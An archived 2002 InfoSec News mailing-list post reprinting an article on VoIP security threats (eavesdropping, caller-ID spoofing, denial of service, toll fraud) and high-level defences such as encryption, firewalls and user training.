[ISN] Security In Converged Networks

From: InfoSec News (isnat_private)
Date: Thu Aug 15 2002 - 23:23:02 PDT

  • Next message: InfoSec News: "RE: [ISN] Security flaw found in Microsoft Web browser"

    August 2002
    With all new technologies there is a security 'honeymoon' during which 
    the technology is below the hacker's radar because of lack of 
    widespread use. As a technology becomes more prevalent, and critical 
    to organizations, its security will be probed and cracks will be found 
    very soon. Internet telephony has now reached the critical mass of 
    adoption and maturity that makes it not only a viable target but also 
    a valuable one, as it becomes part of business critical applications. 
    Whether the intent is to disrupt or profit, it will not be long before 
    the first victims appear. Beyond the monetary risks, there is also a 
    very serious privacy threat as we have become accustomed to government 
    regulation that at least protects our privacy from everyone outside 
    Legacy telephony has long enjoyed a level of protection through law,
    boundaries of physical security, and plain old obscurity that
    delegates it to a separate category of hacking. Apart from a few
    exceptions, telephony hackers or 'Phreakers' as they are dubbed, were
    a breed of their own with very specialized tools and techniques. Very
    few hackers were adept both in the world of computers and in the world
    of telephony.
    The telephony landscape and its relation to society is rapidly 
    changing. When the phenomenon of 'convergence' between telephony and 
    Internet started, it also brought closer the world of the phreaker and 
    the hacker. VoIP brings all this to the next level. Unfortunately, the 
    security inherent in VoIP solutions is equivalent to that of the early 
    Internet: Non-existent.
    With the convergence between voice and data, the critical barrier to 
    would-be attackers quickly crumbles. The physical separation of the 
    two networks and the relative security of voice networks were 
    primarily enforced by federal laws and proprietary infrastructures, 
    which are less effective as the networks converge. From a legislative 
    perspective the transformation of the telephony landscape is of great 
    concern: The current laws do not protect security or privacy; nor do 
    they allow law enforcement access for wiretaps. Where the Internet 
    spreads, it brings with it disrupting influences of new models and 
    paradigms. In telephony the disruption is just starting, but the 
    changes are going to be more staggering than we can imagine.
    Since IP is the underlying protocol used for the transmission of voice 
    data, a VoIP network will be susceptible to the same security problems 
    inherent in any IP-based network. Additionally, there is an added 
    level of complexity in VoIP networks because of the challenges that 
    must be met by VoIP technology in order to achieve useful levels of 
    service for transmitting speech in an efficient and effective way.
    The most important threats in a converged world of ubiquitous VoIP 
    * Eavesdropping from anywhere in the world (Privacy). 
    * Social engineering (Authenticity/Integrity). 
    * Disruption of voice communications/Denial of service (Availability). 
    * Resource Theft (free calls for all). 
    Eavesdropping on a telephony network requires either physical access 
    to the wiring, or access to the digital backbones of the telephone 
    companies. In a converged network, all the eavesdropper need do is 
    compromise the security of the data network (or the endpoints) and he 
    or she can access the voice streams. Such a 'virtual wiretap' is much 
    more insidious than a physical wiretap, because it is almost 
    impossible to detect. The copying of bits does not impact the original 
    stream in any way. Therefore, unless one can control the access to the 
    data network, the voice data is vulnerable. In many ways, we have 
    grown used to an 'expectation of privacy' on telephone networks. This 
    will no longer hold true unless we take steps to ensure our privacy 
    with sophisticated security measures. Furthermore, the 'virtual 
    wiretap' can be effected from, and the sound transmitted to, anywhere 
    in the world. In fact I could hire someone to tap into your network 
    and send me the audio, from anywhere in the world: Outsourcing meets 
    wiretaps. For me to be able to listen in to your conversation, I would 
    have to be able to decode the audio stream. With most current 
    protocols, this is trivial. Encryption, however, would put an 
    insurmountable obstacle in my path.
    Encryption is a well-developed technology, which has been applied to 
    many different communications solutions. In the cellular phone market 
    the term 'digital' has become synonymous with 'private' as the 
    encryption has been sold as a product feature. There are two barriers 
    to the application of encryption in VoIP. The first, as ever, has to 
    do with standardization of the protocols. In order for encryption to 
    be effective it must be very simple to use; in effect it must be 
    transparent to the user. This requires standardization of the VoIP 
    protocols (still in the early stages) and the encryption mechanisms. 
    Because of the necessity to allow for upgrading of the encryption 
    standards as they become obsolete or easy to 'crack,' it is important 
    to have an open architecture that allows for 'negotiation' of suitable 
    encryption algorithms between the end-points at runtime. This can be 
    implemented in a similar way to the current support for multiple voice 
    codecs with runtime negotiation.
    Encryption has become hugely popular as a means to leverage the 
    Internet for corporate communications. Virtual Private Networks (VPNs) 
    allow companies to transfer data between offices securely. An 
    alternative to 'native' support of encryption within the VoIP 
    protocols is the use of VPN tunnels in order to 'wrap' the voice 
    stream. Unfortunately, this is quite difficult in practice. VPN 
    devices and software are not currently designed to accommodate 
    real-time traffic. As a result, they tend to add unacceptable levels 
    of jitter and latency to the VoIP communications. Although just about 
    bearable in small installations (1-2 voice streams), they become 
    unwieldy in larger applications (VoIP between branches of a company, 
    over VPNs for example).
    Another important threat for VoIP networks is the ability to 'enhance' 
    social engineering attacks. Social Engineering is the practice of 
    using social skills and deception to exploit human vulnerabilities 
    rather than system vulnerabilities. A common example is persuading 
    someone in a company to give you their password by pretending to be an 
    administrator in their IT department.
    Imagine how much easier it would be to persuade someone that you work 
    for the company, if you can make their VoIP phone display the 
    origination of the call as 'IT Helpdesk.' Or imagine how simple it 
    would be if you could disguise your voice electronically to be 
    identical to that of their boss. Software that allows digital 
    impersonation has already been demonstrated; albeit crude, it is only 
    a matter of time before it is sophisticated enough to be 
    indistinguishable from the real person. The saving grace is that with 
    current technology, it is unlikely this can be done at real-time 
    without significant expenditure. Nevertheless, pre-recorded messages 
    that sound like someone else are within the capabilities of desktop 
    systems. And don't forget, your grace period diminishes by half every 
    18 months according to Moore's law.
    In order to protect against this kind of digital impersonation, there 
    can be a number of solutions. The most secure approach would be 
    widespread application of digital signatures and PKI for the 
    authentication of end-users. This approach is not only very difficult 
    to apply globally, it also has some disturbing privacy implications 
    (anonymity after all is a feature most of us are used to when making 
    calls, Caller-ID notwithstanding). An alternative is to apply generic 
    controls at an organization's perimeter such as firewalls and 
    Intrusion Detection Systems, which would protect against an outsider 
    gaining access in this manner.
    Technology notwithstanding, the most effective solution is the same as 
    with social engineering in other circumstances: Don't believe what the 
    phone displays, don't assume you know who you're talking to and be 
    smart about what kind of information you give to people on the 
    telephone. These are all basic security awareness issues and should be 
    handled as such with appropriate training and drills. Security is not 
    just about technology; it is about people applying technology with a 
    bit of common sense.
    Although most consumers will berate their telecommunications providers 
    and complain bitterly about the service, in truth we have been 
    accustomed to a high level of reliability when using the phone. How 
    many times in your life have you picked up the phone and not heard a 
    dial tone? Achieving the kind of reliability that makes phones 'just 
    work' 99.999 percent of the time would be enviable in the world of IT. 
    So as we converge and shift voice onto a dynamic ad-hoc network such 
    as the Internet we are bound to (at least at first) lose some 
    From a security perspective however, there is a much-increased 
    opportunity for mischief. This comes mainly in the form of Denial of 
    Service (DoS), which is already one of the most common types of 
    attacks on the Internet. Denial of Service involves attacks whose main 
    aim is to affect the availability of a system by disrupting services, 
    applications or networks. In the telephony world, DoS would make you 
    always get a busy signal. How would DoS affect a converged network?
    It is Wednesday afternoon, and the Federal Reserve is about to 
    announce whether it will change interest rates. At the city's largest 
    bond trader, all the IP phones stop working at exactly the moment the 
    announcement is made. The traders are unable to trade and as a result 
    the company loses millions of dollars in the 15 minutes it takes to 
    restore service.
    Clearly there is a much greater danger of disruption for converged 
    networks. Furthermore, as data and voice travel over the same network, 
    disruption of one affects the other. The VoIP failure may simply be a 
    side effect of a wider DoS attack against the company's network.
    Unfortunately, there is no foolproof way to protect against DoS. A DoS 
    attack will target and attempt to exhaust resources that you 
    voluntarily make available. For example, if you allow incoming VoIP 
    sessions from outside your organization, these can be used 
    indiscriminately by anyone. If someone decides to abuse these 
    resources, there is not much you can do. They may have disguised their 
    source address, or may keep changing source addresses, making it 
    difficult or impossible to block an attack. Denial of Service can't be 
    stopped because it is based on tying up publicly available resources 
    by brute force. If everyone in NY called your phone, you would not be 
    able to use it and would have to disconnect it. Even the phone company 
    could not help you stop people from calling you without a specific 
    number to block.
    PBX owners have already had to deal with theft of service. Phreakers 
    will compromise PBX security and use the system to make free calls or 
    organize 'party lines' to communicate with their friends. The 
    Communications Fraud Control Association (http://cfca.org/) says “it 
    is estimated that annual fraud losses are in excess of $12 billion 
    Convergence will only increase this threat of theft. As the networks 
    converge there will be a need for gateways connecting VoIP systems to 
    POTS (plain old telephone service). These gateways allow normal phones 
    to call VoIP phones and vice-versa. Whether these gateways are part of 
    a PBX or part of a VoIP system, they represent the border between 
    telecommunications networks and data networks. This means that they 
    will make telecommunications networks more accessible from the data 
    network side. Hackers will almost certainly find ways to “spoof” 
    (pretend to be some known system), gaining access to the gateway as a 
    legitimate user and making phone calls at the expense of the company. 
    The security designed into such gateways at present is at best 
    trivial. Even a rather unskilled attacker can quite easily spoof the 
    SIP sessions and UDP packets that compose the voice stream. The 
    authentication systems that have been added on to SIP and H.323 in 
    order to restrict access are not very well designed and mostly send 
    the authentication details in the clear (not encrypted) so that 
    someone with access to the network can compromise them quite easily.
    The solution to theft of service is a combination of technology, 
    monitoring, and awareness. From the technology perspective it is 
    imperative that at least simple controls such as firewalls and 
    password access be added to the telephony gateways to protect against 
    unauthorized access. Monitoring of use and user training and awareness 
    can complement the technical solutions in order to improve the 
    security. After all, you don’t want to find out about service theft 
    when you get your bill and discover it is $250,000 more than expected. 
    Continuous monitoring and auditing will at least give you an early 
    warning of problems.
    A global converged network will change the telephony landscape 
    completely. New services, applications, and paradigms are already 
    emerging. In the rush to migrate telephony to the more flexible 
    infrastructure of the Internet, security has almost been an 
    afterthought. Soon it will become obvious that a flexible and open 
    network creates security problems that were not issues in the closed 
    proprietary past of telephony. These issues will need to be addressed 
    in order for Internet telephony to flourish. There will certainly be 
    challenges at first, but most of the technical difficulties can be 
    overcome if security is made part of the design requirements of new IP 
    telephony applications from the beginning. As organizations migrate 
    their internal phone systems to IP, they will be able to protect them 
    by applying security best practices at the perimeter of the 
    Many of the security solutions are not VoIP specific; rather the 
    solutions involve the same combination of people, processes, and 
    technology that are applied to protect data networks. Security within 
    corporate networks can be improved by protecting the perimeter and 
    applying encryption. The real challenge will appear when IP telephony 
    transcends the boundaries of a single organization. When companies 
    start connecting to each other or accepting incoming VoIP connections 
    from the public, the security problems will become much more serious. 
    Solutions will depend on designing security into the protocols and 
    user agents. Unfortunately, security is often “bolted” on as an 
    Perhaps the most pertinent lesson is that it is estimated that 
    security measures cost 10 times less if they are included in the 
    design and not added on after the implementation. Internet telephony 
    pioneers can reap significant savings by considering security at the 
    earliest stages in the development of applications or systems. If they 
    do not, they will soon discover that the honeymoon is over.
    Andreas M. Antonopoulos is security practice leader at Greenwich 
    Technology Partners. Joseph D. Knape is an independent security 
    consultant in Dallas, Texas.
    Greenwich Technology Partners is a leading network infrastructure 
    consulting and engineering company that designs, builds, and manages 
    the complex networks that utilize advanced Internet protocol, 
    electro/optical, and other sophisticated technologies. Additional 
    information about Greenwich Technology Partners can be found online at 
    ISN is currently hosted by Attrition.org
    To unsubscribe email majordomoat_private with 'unsubscribe isn'
    in the BODY of the mail.

    This archive was generated by hypermail 2b30 : Fri Aug 16 2002 - 02:33:21 PDT